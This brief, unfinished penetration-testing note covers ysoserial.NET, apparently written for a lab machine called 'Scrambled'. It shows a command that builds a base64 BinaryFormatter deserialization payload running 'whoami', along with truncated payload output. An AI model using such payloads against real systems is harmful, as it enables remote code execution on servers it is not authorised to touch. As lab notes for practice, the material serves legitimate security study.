Ysoserial.NET
ysoserial.NET this tool only works for Windows, after download it we need to identify the format of the binary or program running the code (-g) and the format (-f) that has the deserialization/serialization vulnerability:
1
2
3
C:\Users\Administrator\Desktop\Release>ysoserial.exe -g WindowsIdentity -f BinaryFormatter -o base64 -c "whoami"
AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFs...
dGdVkyVStEUW84TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2o0TAs=
Example: Scrambled
Ysoserial.jar
ysoserial.jar for java deserialization
TODO